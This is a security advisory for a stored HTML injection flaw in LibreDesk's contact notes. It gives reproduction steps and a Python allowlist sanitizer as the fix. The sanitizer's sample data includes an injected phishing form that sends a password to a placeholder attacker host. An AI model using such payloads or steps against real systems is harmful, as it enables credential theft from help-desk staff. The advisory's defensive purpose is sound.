LibreDesk Stored HTML Injection Vulnerability in Contact Notes Feature
Vulnerability
A stored HTML injection vulnerability has been identified in LibreDesk versions prior to 0.8.6-beta, specifically within the contact notes feature. When a note is added, its content is wrapped in paragraph tags before it is sent to the API. However, an attacker can intercept the request, remove the paragraph tags, and inject arbitrary HTML elements such as forms and images. This injected content is then stored and displayed without adequate sanitization, potentially leading to phishing attacks, unauthorized actions reminiscent of Cross-Site Request Forgery, and user interface manipulation. The vulnerability arises because the application relies on client-side HTML formatting assumptions rather than sanitizing on the server, so the protection is bypassed simply by modifying the request payload.
Impact
Exploitation of this vulnerability allows for stored HTML injection, with the injected content being rendered in the application. This could lead to credential phishing, Cross-Site Request Forgery-like attacks, user interface manipulation, and social engineering opportunities, especially if the affected notes are viewed by users with administrative or agent privileges.
Reproduction
To reproduce this vulnerability, log into LibreDesk and navigate to any contact. Add a note through the user interface, which will be sent as a POST request to the API with the note content wrapped in paragraph tags. Intercept this request and modify the payload by removing the paragraph tags and injecting arbitrary HTML, such as a form. After forwarding the modified request, the injected HTML will be rendered when the contact note is viewed in the LibreDesk interface.
Remediation
Users can update to LibreDesk version 0.8.6-beta, which addresses this vulnerability by implementing proper HTML sanitization before storing and rendering note content.
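The fix described above is server-side sanitization before storing and rendering note content. The following is an added illustration, not LibreDesk's own code: a small allowlist sanitizer built on Python's standard-library HTML tokenizer that keeps only harmless formatting tags, strips every attribute, drops anything else (forms, inputs, images), and reports which tags it removed so existing notes can be audited. The note payloads are constructed for the example; the domain attacker.invalid is a placeholder.

```python
from html import escape
from html.parser import HTMLParser

# Tags a support note legitimately needs. Everything else is dropped, and no
# attributes survive at all, so form actions, image sources and event handlers
# never reach the stored note.
ALLOWED_TAGS = {"p", "br", "b", "i", "em", "strong", "ul", "ol", "li"}
VOID_TAGS = {"br"}


class NoteSanitizer(HTMLParser):
    """Allowlist sanitizer: re-emits permitted tags without attributes,
    escapes all text, and records the tags it discarded."""

    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.out = []        # sanitized fragments, joined by result()
        self.open_tags = []  # stack of allowed tags currently open
        self.dropped = []    # disallowed tags seen, useful for alerting

    def handle_starttag(self, tag, attrs):
        if tag in ALLOWED_TAGS:
            self.out.append(f"<{tag}>")      # attributes deliberately discarded
            if tag not in VOID_TAGS:
                self.open_tags.append(tag)
        else:
            self.dropped.append(tag)

    def handle_startendtag(self, tag, attrs):
        # <br/> style tags: emit if allowed, never push on the stack
        if tag in ALLOWED_TAGS:
            self.out.append(f"<{tag}>")
        else:
            self.dropped.append(tag)

    def handle_endtag(self, tag):
        # Only close tags we actually opened; unwind to the match so the
        # output stays well-formed even if the input is not.
        if tag in ALLOWED_TAGS and tag not in VOID_TAGS and tag in self.open_tags:
            while self.open_tags:
                t = self.open_tags.pop()
                self.out.append(f"</{t}>")
                if t == tag:
                    break

    def handle_data(self, data):
        # Entities were decoded by the tokenizer; re-escape so text can
        # never be interpreted as markup when rendered.
        self.out.append(escape(data))

    def result(self):
        while self.open_tags:               # close anything left open
            self.out.append(f"</{self.open_tags.pop()}>")
        return "".join(self.out)


def sanitize_note(body):
    """Return (sanitized_html, dropped_tags) for a submitted note body.
    Call this on the server before storing, regardless of what the client sent."""
    parser = NoteSanitizer()
    parser.feed(body)
    parser.close()
    return parser.result(), parser.dropped


# Constructed sample payloads.
BENIGN_NOTE = "<p>Customer called about invoice #1042 &amp; shipping</p>"
INJECTED_NOTE = (
    '<form action="https://attacker.invalid/collect">'
    "<p>Session expired, please sign in again:</p>"
    '<input type="password" name="pw"><button>Sign in</button></form>'
    '<img src="https://attacker.invalid/seen.gif">'
)

if __name__ == "__main__":
    for note in (BENIGN_NOTE, INJECTED_NOTE):
        clean, dropped = sanitize_note(note)
        print("stored:", clean)
        if dropped:
            print("dropped disallowed tags:", dropped)
```

Running `sanitize_note` over notes already in the database and flagging any with a non-empty dropped list is a quick way to find content injected before the upgrade. The allowlist approach matters: a denylist that only removes known dangerous tags is easy to bypass with the next tag it did not anticipate.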